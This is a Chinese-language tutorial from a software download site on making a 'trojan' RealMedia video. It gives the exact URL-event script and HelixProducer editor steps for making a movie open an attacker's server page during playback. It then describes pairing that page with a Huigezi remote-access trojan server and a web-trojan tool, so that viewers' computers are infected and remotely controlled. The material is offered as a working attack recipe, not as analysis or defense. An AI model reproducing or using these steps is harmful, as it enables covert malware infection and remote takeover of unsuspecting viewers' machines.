绿色系统下载网站,值得信赖的XP系统下载站!

系统工具|网络软件|应用软件|网络聊天|图形图像|多媒体类|教育教学|安全相关|程序开发|行业软件
您的位置:首页 > 电脑教程 > RM影片木马的制作过程

RM影片木马的制作过程

发表于:2012-11-22 15:41:50   来源:http://www.greendl.com/

   制作RM影片木马需要两个步骤:一是让RM影片在播放时自动弹出IE浏览器窗口,并自动访问相应的网页,这一点很容易做到。二是在指定的网页中要放置恶意代码、病毒等程序。两者结合后,就是一个标准的RM影片木马了。下面,让跟系统之家一起来看看制作过程。

  让RM影片在播放时自动弹出IE浏览器窗口,并自动访问相应的网页这一步的制作,需使用HelixProducerPlus来完成。此软件的下载网址是:

  HelixProducerPius英文原版下载网址:http://www.skycn.com/soft/1272.html

  HelixProducerPius汉化补丁下载网址:http://www.skycn.com/soft/12470.html

  在windows7系统下载完毕并安装完成后,首先使用任一款播放器打开要捆绑弹出网页代码的RM影片,在其中观察一下影片播放的时间长度。在如图所示中,可以看出影片的长度是10分21秒。

  RM影片木马的制作过程

  根搪影片的总长度,我们可以决定在影片中隔多少时间放一次弹出网页代码,从而使影片的播放中处处“危机四伏”。假设,我们打箅实现如下目的:

  在影片“009.rm”的播放中,在00:01:01至00:01:30这个时间范围中,自动弹出“http://218.93.223.135/index.aspn页面。

  在影片“009.rm”的播放中,在00:03:00至00:03:30这个时间范围中,自动弹出“http://218.93.223•135/web/index•asp”页面。

  根据这个目标,开始在RM中捆绑网页弹出代码,方法如下:

  步骤一:新建一个文本文件,在其中输入如下命令:

  u00:01:0100:01:30

  http://218.93.223.135/index.asp

  u00:03:0000:03:30

  http://218.93.223.135/web/index.asp

  步骤二:输入完毕后,将文件保存成名为“001”(可以任意命名)的文本文件。

  RM影片木马的制作过程

  现在来解释一下代码的含义,以第一行代码为例,代码中的u表示URL事件,这个事件将激活IE浏览器的自动弹出;00:01:00是起始时间00:01:30.001:10是结束时间;后面则是指定的要自动打开的网页。

  步骤三:进入“C:ProgramFilesRealHelixProducerPlusRealMediaEditor”文件夹,找到如图所示的名为Rmedtgui.exe的文件。

  RM影片木马的制作过程

  步骤四:双击运行Rmedtgui.exe文件后,在弹出的如图所示窗口中,依次单击“File”—“OpenRealMediaFile”菜单。

  RM影片木马的制作过程

  步骤五:在将名为“009.rm”的文件添加进来后,依次单击“Tools”—“MergeEvents”菜单。

  RM影片木马的制作过程

  步骤六:在弹出的对话框中,将前面生成的名为“001.txt”的文件添加进来。

  RM影片木马的制作过程

  步骤七:在单击“打开”按钮后,将出现如图所示的合并事件进度框。

  RM影片木马的制作过程

  步骤八:在合并完成后,依次单击“File”—“SaveRealMediaFileAs”菜单。将写入事件的RM文件另存为一个新的RM文件,如图所示的“0091.rm。

  RM影片木马的制作过程

  步骤九:稍后,将出现如图所示的保存过程、这个过程将会把写入事件后的RM文件创建出来。

  RM影片木马的制作过程

  步骤十:在保存完毕后,将Rmedtgui.exe窗口关闭。并用RealPlayer播放生成的00.91文件,在播放到指定时间时,就会自动弹出如图所示的浏览窗口(RealPlayer内置了浏览器'所以会使用内置的浏览器),并打开指定的网页页面内容。

  RM影片木马的制作过程

  步骤十一:在第一步成功完成后,就可以进行第二步的在网页中添加木马的操作了。添加的木马的操作有两步:一是使用灰鸽子等木马工具制作出一个服务器端。

  RM影片木马的制作过程

  二是使用制作网页木马工具,指定访问特定的网页时能够自动运行灰鸪子服务器端。

  RM影片木马的制作过程

  接着将具有灰鸪子服务器端和能够调用灰鸪子任务器端的网页一起上传到服务器指定的路径。清注意这个路径的最终访问网址,一定要与RM影片中指定网址相同。这样才能实现通过影片中的恶意代码激活网站中的木马的目的,进而通过客户端程序控制自动安装了木马服务器端的目标主机。